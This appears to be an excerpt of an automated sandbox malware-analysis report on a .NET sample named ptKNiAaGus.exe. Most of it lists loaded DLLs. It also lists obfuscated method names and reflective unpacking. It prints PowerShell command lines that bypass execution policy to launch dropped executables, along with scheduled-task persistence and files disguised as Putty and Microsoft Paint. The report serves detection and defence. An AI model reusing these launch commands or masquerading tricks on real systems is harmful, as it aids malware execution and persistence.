Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Section loaded: devenum.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Section loaded: devobj.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Section loaded: msdmo.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Section loaded: secur32.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: mscoree.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: apphelp.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: version.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: edgegdi.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: amsi.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: userenv.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: profapi.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: sxs.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: devenum.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: winmm.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: devobj.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: msasn1.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: msdmo.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: wldp.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: sspicli.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: devenum.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: devobj.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: msdmo.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: mscoree.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: version.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: edgegdi.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: amsi.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: userenv.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: profapi.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: sxs.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: devenum.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: winmm.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: devobj.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: msasn1.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: msdmo.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: wldp.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: sspicli.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: devenum.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: devobj.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: msdmo.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: mscoree.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: version.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: edgegdi.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: amsi.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: userenv.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: profapi.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: sxs.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: devenum.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: winmm.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: devobj.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: msasn1.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: msdmo.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: wldp.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: sspicli.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: secur32.dll

Source: C:\Users\user\Desktop\ptKNiAaGus.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: ptKNiAaGus.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: ptKNiAaGus.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Data Obfuscation

.NET source code contains potential unpacker

Source: ptKNiAaGus.exe, WSBzhPoDCyO.cs	.Net Code: DkrItwdZ
Source: 0.2.ptKNiAaGus.exe.1bad0000.0.raw.unpack, Packet.cs	.Net Code: Read System.Reflection.Assembly.Load(byte[])
Source: 0.2.ptKNiAaGus.exe.1bad0000.0.raw.unpack, Packet.cs	.Net Code: Read System.Reflection.Assembly.Load(byte[])
Source: 0.2.ptKNiAaGus.exe.1bad0000.0.raw.unpack, Packet.cs	.Net Code: Read
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, gEjezvihrA.cs	.Net Code: oRziWoOpFzwVe
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, gEjezvihrA.cs	.Net Code: oRziWoOpFzwVe
Source: xdwdPutty.exe.33.dr, gEjezvihrA.cs	.Net Code: oRziWoOpFzwVe

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"'

Binary contains a suspicious time stamp

Source: ptKNiAaGus.exe

Static PE information: 0xF5FE416F [Wed Oct 13 03:20:15 2100 UTC]

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Code function: 0_2_00007FFF60F500BD pushad ; iretd	0_2_00007FFF60F500C1
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Code function: 17_2_00007FFF60F500BD pushad ; iretd	17_2_00007FFF60F500C1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Code function: 19_2_00007FFF60F63928 push eax; retf	19_2_00007FFF60F63931
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Code function: 19_2_00007FFF60F600BD pushad ; iretd	19_2_00007FFF60F600C1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Code function: 19_2_00007FFF60F68780 push es; ret	19_2_00007FFF60F68C46
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Code function: 19_2_00007FFF60F68780 push es; ret	19_2_00007FFF60F68C4E
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Code function: 33_2_00007FFF60F43928 push eax; retf	33_2_00007FFF60F43931
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Code function: 33_2_00007FFF60F400BD pushad ; iretd	33_2_00007FFF60F400C1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Code function: 33_2_00007FFF60F48780 push es; ret	33_2_00007FFF60F48C46
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Code function: 33_2_00007FFF60F48780 push es; ret	33_2_00007FFF60F48C4E
Source: C:\Users\user\xdwdPutty.exe	Code function: 36_2_00007FFF60F400BD pushad ; iretd	36_2_00007FFF60F400C1
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Code function: 50_2_00007FFF60F200BD pushad ; iretd	50_2_00007FFF60F200C1
Source: C:\Users\user\xdwdPutty.exe	Code function: 55_2_00007FFF60F500BD pushad ; iretd	55_2_00007FFF60F500C1
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Code function: 64_2_00007FFF60F600BD pushad ; iretd	64_2_00007FFF60F600C1
Source: C:\Users\user\xdwdPutty.exe	Code function: 78_2_00007FFF60F300BD pushad ; iretd	78_2_00007FFF60F300C1

Source: ptKNiAaGus.exe, BlZVXHIIaPbHfI.cs	High entropy of concatenated method names: 'tSODIOiBRDXJwkT', 'BJcsukRMTZ', 'wvIinJskLeX', 'eSjHRzyM', 'GAZxDPFJBCj', 'pmFJVkADAIldI', 'ZKcANVNApvikktn', 'KbnSpgexvOxJ', 'yPwpEqvgApO', 'oxKbkAHQZxJ'
Source: ptKNiAaGus.exe, ngXUOZCVh.cs	High entropy of concatenated method names: 'SugoyTPgJVvv', 'lWREblyMHEKGgdx', 'wVWJrmsraWSrMU', 'LsgmxwUakjPKpWh', 'qRtNAZmIzd', 'dESGAnJyOArz', 'bulabbDUsFcaSH', 'mFXmUWrWRcPWfXT', 'zSDlFnLhXa', 'kyqghgPL'
Source: ptKNiAaGus.exe, aTWRcRmMPAC.cs	High entropy of concatenated method names: 'YWlLHFrhEUxDwZo', 'QNksPVFxWLWn', 'tgWUvohOwiwNQU', 'VSUDcHvC', 'JhDRnoviDs', 'najBlHPTf', 'fzAzbEqTLgxeHK', 'kQaHmNJXJR', 'iTSVrcWadiCRMkE', 'sLMJTYnArp'
Source: ptKNiAaGus.exe, rEMvqXUYw.cs	High entropy of concatenated method names: 'KQdgoRhaxzvrrCD', 'ZwAejkTaYkz', 'eUlIvLBnLcIAl', 'ngMAMJrSyYXSO', 'xCHESzwdOmw', 'AQMxoAtxxnNYX', 'qLVNlcwcqIUDim', 'KSZEgJbFBkXZQc', 'ojhcIkHAB', 'kXaDckRHJm'
Source: ptKNiAaGus.exe, sXNNIwuBLyDCn.cs	High entropy of concatenated method names: 'KzETmFIz', 'HggOwIlWtJnS', 'fZytGkgFkIg', 'qyHrOJZtuG', 'chytZbKsAjkUf', 'syYTXXYzvGJ', 'efANZeZsWMIq', 'dZPgjFec', 'VKBZXiHdlsj', 'wermKFvmygqhNtx'
Source: ptKNiAaGus.exe, kiBrAzKlhwI.cs	High entropy of concatenated method names: '_003CScreenShot_003Eb__16_0', 'GFHyolqxTiPW', 'rTDCGOXiyndD', 'xofGmlAsdGWCitw', 'ABTeMIfH', 'ailvIRdutoBSM', 'eWmNMhAYVadxmKY', 'oIXXMDOwVpsHo', 'vmoFpIZv', 'aiBMLSKeSW'
Source: ptKNiAaGus.exe, FSmyfmyMutFI.cs	High entropy of concatenated method names: 'IHADBbEs', 'hQUjjodBxy', 'BVWSWKGm', 'NYnlEwRYEl', 'QmolVevCJjswHEE', 'lihqVSbCIdienW', 'xMDnOgkw', 'OEchVcghzJgpXv', 'yLlcsvQOndv', 'DRqGAlpbQpthg'
Source: ptKNiAaGus.exe, fJqINigGmUCZC.cs	High entropy of concatenated method names: 'QlbUeGpFUx', 'olCxFkzEoyLXkt', 'zFJGvZFLDjJBq', 'rZpsSZweJhjCU', 'TFNqauGkwN', 'QiZyOwjJ', 'xYVfRUnVvcX', 'FqsyVSbwaGdcqC', 'WfvlAswRujiZFG', 'pUpJKrhAsdHNw'
Source: ptKNiAaGus.exe, BsbXIFfqT.cs	High entropy of concatenated method names: '_003CStart_003Eb__1_0', '_003CUninstall_003Eb__2_0', '_003CLoopInstall_003Eb__7_0', '_003CStartAsBypass_003Eb__10_0', 'UAOIwMuBa', 'mRWRLoTV', 'FiZsYJBwGnrKc', 'UBMyoZKFhorUkV', 'MUlKKOcvH', 'yuQnOiuKZCPypf'
Source: ptKNiAaGus.exe, nOmJeajqakZQx.cs	High entropy of concatenated method names: 'VMDOPKelokaHLzt', 'kzXYTmdFAApojK', 'zFhHDuDSU', 'CZBjWOjw', 'zZsZeiiyNOUpB', 'baBdspyhhCSR', 'bVdlGrCKk', 'gCYVvpDA', 'AvaJVkrHiS', 'qGMVHcjcOxyTrU'
Source: ptKNiAaGus.exe, vJbYblzYrfoB.cs	High entropy of concatenated method names: 'gFWqIJotzNwvM', 'pfdyvOpMWAXN', 'tmLjgQlSNFQ', 'MEkwwfdOG', 'sNgsnsTiV', 'ulvGndQeaNb', 'NpjJFQaUuyS', 'tyCnctyfkwPbJ', 'ISPyothTzrJe', 'CIAZvTLNpbcChO'
Source: ptKNiAaGus.exe, AFDAeWnBGIKu.cs	High entropy of concatenated method names: 'oDwpjjxTMPM', 'PUGJgxszPRRk', 'VAcvknCno', 'JWXeSLLnqrXP', 'hrZLRvHW', 'MfOjUXcbJpaqw', 'ITaoEdbtnGyvDK', 'kshHYJsPjqnK', 'hhoKkDRrrG', 'tJSsIlZU'
Source: ptKNiAaGus.exe, WBkUEsbhmZeNIv.cs	High entropy of concatenated method names: 'SoSyVSXfCVs', 'XTskBgXiTfIyZBX', 'UgSMOJxLAaoY', 'WiyMvDNtpchkMCn', 'UZUvtLVCfiNW', 'jbsykxwJldxJk', 'DlbCGKfgATdE', 'MwgMprLGB', 'lcEqWivWlJgSRD', 'GLCCaYVfmkNF'
Source: ptKNiAaGus.exe, ctLKvSYSpZJt.cs	High entropy of concatenated method names: 'juxIMOhpgo', 'RdVUgDBImozuSxE', 'gPXRhKdsjiHcVG', 'vENtRwDmmXBHbk', 'fKIaAaIX', 'HAdkywZmfA', 'pFEmsddl', 'gCBHjCwUvGNmhw', 'RSTnqyPcagKZG', 'hXwXekEyVBv'
Source: ptKNiAaGus.exe, ixSNFcnAZd.cs	High entropy of concatenated method names: 'yFrqudjmVPGe', 'JkHgNblQEtPkoGd', 'UmYjXsTLRQXsFez', 'TUDUVGmysNtM', 'FGXGoBdivZQR', 'PxDsLatoRUCIcNz', 'qKzGjLKzlQd', 'sXunDYrpvAB', 'TnolVxMndI', 'PRKNDnDH'
Source: ptKNiAaGus.exe, TJFZgosWeymV.cs	High entropy of concatenated method names: 'gSupzYBgpZPN', 'IKqmTgAuQrpwBf', 'nGhYugYGHy', 'URudkqMsgigseFV', 'PbFtyslsjrqSH', 'EjoZMiAmGzjJz', 'HODTYxJeCFwbg', 'utAulwew', 'FtnjcVFJ', 'tEkVoXtKaZgjdk'
Source: ptKNiAaGus.exe, EzwqebyGv.cs	High entropy of concatenated method names: '_003CPatchMem_003Eb__0', 'XvhDVIDTsz', 'FblPzXsORRWA', 'JozepQtc', 'apucNvwVuq', 'jyYLbeDFsew', 'vethIZdb', 'zpAwVWKx', 'vXfbTLPoDL', 'okmdoyxTOn'
Source: ptKNiAaGus.exe, ncSubYLaTjDxEKi.cs	High entropy of concatenated method names: 'HDWwlYrbKQdNSsA', 'esngNPlUUlpm', 'hZZcJBbDb', 'PkqkKvxIa', 'ZSMWBisRCbAjF', 'crElIqYaDj', 'wXebZXdPCkO', 'CaaJJAzIff', 'HSrMzkKyPcy', 'LNpcEWUC'
Source: ptKNiAaGus.exe, WSBzhPoDCyO.cs	High entropy of concatenated method names: 'zIwxKQJLlKR', 'qABCbysjh', 'zBiSdHrPVoqvwo', 'hjTaakMApIh', 'lbEFfpGJvP', 'mCUVodUuDMfuPZ', 'HInAsKwtF', 'RiLGpfbSrhYGOX', 'VNeBGhpfWiy', 'uWhqIOhXuJo'
Source: ptKNiAaGus.exe, YdxQPCPenRPlm.cs	High entropy of concatenated method names: 'OxDjszrRWVWVc', 'dsDylpVj', 'yDTeALhtU', 'ITqcXHToHG', 'tuaIAuNQzwPf', 'EgZVrFobCHTnnQ', 'qSANchFJsVzQ', 'dURtnDXriyx', 'RArmGVNe', 'ZhvBDFzXgzroU'
Source: ptKNiAaGus.exe, UfMnWsvflYsaAsK.cs	High entropy of concatenated method names: 'cSvGSUoqZkIU', 'bDaXGzsPHOnjQl', 'wNlgcmunuLdArVN', 'kboKUSDusSOUE', 'WBiutLybr', 'gQfLczAt', 'bDIbbZeKroKYajm', 'cRxbCoIjkdDmrS', 'RUacEOZHUPBGnh', 'GhsWzhCRrmuY'
Source: ptKNiAaGus.exe, LyYGZtBCXfhLta.cs	High entropy of concatenated method names: 'CegapNQcJfAJ', 'AHNZNTemugjcDX', 'vdREkUzXp', 'CcvVObYkKCPSHxa', 'oIxwxlqEggNwYWA', 'YdKqiQfFKstUw', 'WUdnfrZszRmr', 'iNcLoBfudmjOYc', 'mFsVHCJtSkqJLf', 'tDqbwrigESQj'
Source: ptKNiAaGus.exe, LgUPyuNhoLG.cs	High entropy of concatenated method names: 'qASorupmplRQ', 'CDYUXuDrC', 'qcrJhNQjBoYVi', 'HcVZjhZODFwrpM', 'QDmoSbLzkI', 'ZCPcmgViMvY', 'IVIbZmNpXDSk', 'lhPNwclQJHXzb', 'PWGzVsYeSK', 'mMWSBVjf'
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, YeASamleCu.cs	High entropy of concatenated method names: 'xnIxVRYrPBFYu', 'bdMoOrQxtvgEAC', 'aaKjZcdK', 'koKrGQSFGdzIY', 'oCRzuMRRQWnpbv', 'VNyTdDahZrdday', 'DvBkWgHcjxR', 'XnDRpWQkPBp', 'nNVsIQjrStTsoqZ', 'OkOVMjCtV'
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, BepYSwIiYsKTkc.cs	High entropy of concatenated method names: '_003CScreenShot_003Eb__16_0', 'hgYqlsJf', 'sLrZOuAb', 'kOWJOWvoQlcxdqy', 'DFyYevrypfGFjUe', 'iYAOjYSCuxcYDC', 'VsaLoCDQoW', 'UiPqEvHkOEq', 'PenvdgTTvmQlM', 'JppfHLrLD'
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, gEjezvihrA.cs	High entropy of concatenated method names: 'SNPMxFexzSMQ', 'gDOlHAunu', 'YzPPDudfl', 'vNRfanEABU', 'TnWxvgwZqFpXCrN', 'paCVmbxQTmjLT', 'umZLELsRHOgGvNG', 'PnNGOazzMspGeJ', 'lGuLDxqnBpYTnog', 'kKdWwyNhUmay'
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, WkKaRrezv.cs	High entropy of concatenated method names: 'VsYjwdcp', 'jAGsauzxlaBtYm', 'uBIfrUJxdEg', 'ROggXEKEH', 'skfRutZuJx', 'ypvVxxTaC', 'nujiiFtdoNhS', 'JYzaaPYjvjES', 'kLZHreEmFpw', 'LofQUjZgLlxyX'
